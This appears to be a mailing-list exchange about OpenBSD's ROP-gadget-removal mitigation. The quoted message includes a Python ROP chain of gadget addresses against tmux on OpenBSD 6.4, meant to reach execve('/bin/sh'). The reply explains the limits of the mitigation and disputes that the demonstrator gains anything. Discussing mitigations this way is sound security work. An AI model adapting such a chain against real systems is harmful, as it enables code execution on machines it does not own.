There is no comprehensive & final solution for RET polymorphism due to variable-sized instruction architecture, and the only solution is to move to fixed-sized architectures where all RETs can be protected and ROP-free therefore becomes possible.
The best we can do is reduce it. The ability to reach execve() is being constrained more and more using privsep, pledge where possible, unveil if we can, forcing people to use the execve stub in libc (which is at a per-boot random location), and further efforts (coming soon) which will hurt calling generic syscall or the use of syscall instructions inside other syscall stubs. Each thing increases the effort to reach exploitation. I do not understand the sample you gave, it is impossible to visualize the approach being taken -- you have not shown how you are finding the syscall instruction. Also note that it must be *THE SYSCALL* instruction for execve, in per-boot-randomly-linked aslr-placed libc.so. So you have determined this online? Finally, I believe the phrase "exploit" truly requires a priviledge escalation or gain of other capability. What did you gain? I believe you gain nothing from this demonstrator. Nan ZoE <[email protected]> wrote: > Hello, > > > > I have read your paper regarding the ROP mitigation mechanism (Removing ROP > Gadgets from OpenBSD), and I find the defense against ROP quite ingenious. > The paper introduces the bytecode for 'ret' as '\xc3,' and its association > with the use of the 'rbx' register was a surprising revelation. > Subsequently, you adjusted the prioritization of the 'rbx' register during > compilation, effectively filtering out a significant number of 'ret'-ending > gadgets. This especially removed many misaligned 'ret'-ending gadgets, and > this technique has been applied to openbsd-63, 64, and 65. While the number > of 'ret'-ending gadgets has been significantly reduced, there are still > numerous 'call'-ending gadgets in the program. Security researchers can > still employ many 'call'-ending gadgets to carry out ROP attacks. Even in > programs of only a few hundred kilobytes, I have found that we can still > invoke the execve("/bin/sh", 0, 0) function using only the available > gadgets in the program, albeit it may require a combination of multiple > gadgets and some effort to achieve. I am curious if there are any further > ROP mitigation measures to address this issue? Additionally, I have > provided an ROP attack example targeting the tmux program in OpenBSD-64, as > shown below. > > > > payload = p64(0x4017ce) > > #0x00000000004017ce: pop r13; pop r14; pop r15; ret; > > payload += p64(0x68732f6e69622f)+p64(0x0)+p64(0x0)+p64(0x40125d) > > # 0x000000000040125d: pop rbp; ret; > > payload += p64(0x4017d1)+p64(0x403dd3) > > # 0x0000000000403dd3: xchg eax, ebp; ret; > > payload += p64(0x412208) > > # 0x0000000000412208: mov rcx, r13; call rax; > > payload += b'' > > # 0x00000000004017d1: pop rsi; pop r15; ret; > > payload += p64(0x0)+p64(0x40125d) > > # 0x000000000040125d: pop rbp; ret; > > payload += p64(0x40125d)+p64(0x403dd3) > > # 0x0000000000403dd3: xchg eax, ebp; ret; > > payload += p64(0x427a31) > > # 0x0000000000427a31: pop rbx; pop rbp; jmp rax; > > payload += p64(0x49e0ed)+p64(0x0) > > # 0x000000000040125d: pop rbp; ret; > > payload += p64(0x4017d1)+p64(0x403dd3) > > # 0x0000000000403dd3: xchg eax, ebp; ret; > > payload += p64(0x412053) > > # 0x0000000000412053: mov r8, rbx; call rax; > > payload += b'' > > # 0x00000000004017d1: pop rsi; pop r15; ret; > > payload += p64(0x0)+p64(0x4551d9) > > # 0x00000000004551d9: add qword ptr [r8 - 0x7d], rcx; ret; > > payload += p64(0x4017d3) > > # 0x00000000004017d3: pop rdi; ret; > > payload += p64(0x49e070)+p64(0x40d571) > > # 0x000000000040d571: pop rsi; ret; > > payload += p64(0x0)+p64(0x4017cf) > > # 0x00000000004017cf: pop rbp; pop r14; pop r15; ret; > > payload += p64(0x0)+p64(0x4017d0)+p64(0x0)+p64(0x40125d) > > # 0x000000000040125d: pop rbp; ret; > > payload += p64(0x49e1d0)+p64(0x42d80b) > > # 0x000000000042d80b: mov rdx, r15; mov rcx, qword ptr [rbp - 0x40]; mov > rax, r14; call rax; > > payload += b'' > > # 0x00000000004017d0: pop r14; pop r15; ret; > > payload += p64(0x0)+p64(0x40125d) > > # 0x000000000040125d: pop rbp; ret; > > payload += p64(0x3b)+p64(0x403dd3) > > # 0x0000000000403dd3: xchg eax, ebp; ret; > > payload += p64(0x407fae) > > # 0x0000000000407fae: syscall; > > payload += b'' > > > > Best regards, > > ZoE > > 2023.09.21
